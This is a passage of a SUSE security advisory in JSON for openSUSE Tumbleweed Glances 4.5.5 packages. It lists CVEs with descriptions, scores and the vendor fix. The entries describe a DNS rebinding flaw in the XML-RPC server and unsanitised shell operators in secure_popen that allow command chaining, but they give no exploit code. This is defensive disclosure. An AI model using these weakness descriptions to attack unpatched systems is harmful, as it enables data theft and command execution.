"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46608"
},
{
"cve": "CVE-2026-46611",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46611"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46611",
"url": "https://www.suse.com/security/cve/CVE-2026-46611"
},
{
"category": "external",
"summary": "SUSE Bug 1268856 for CVE-2026-46611",
"url": "https://bugzilla.suse.com/1268856"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-46611"
},
{
"cve": "CVE-2026-53925",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-53925"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-53925",
"url": "https://www.suse.com/security/cve/CVE-2026-53925"
},
{
"category": "external",
"summary": "SUSE Bug 1268984 for CVE-2026-53925",
"url": "https://bugzilla.suse.com/1268984"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-53925"
}
]
}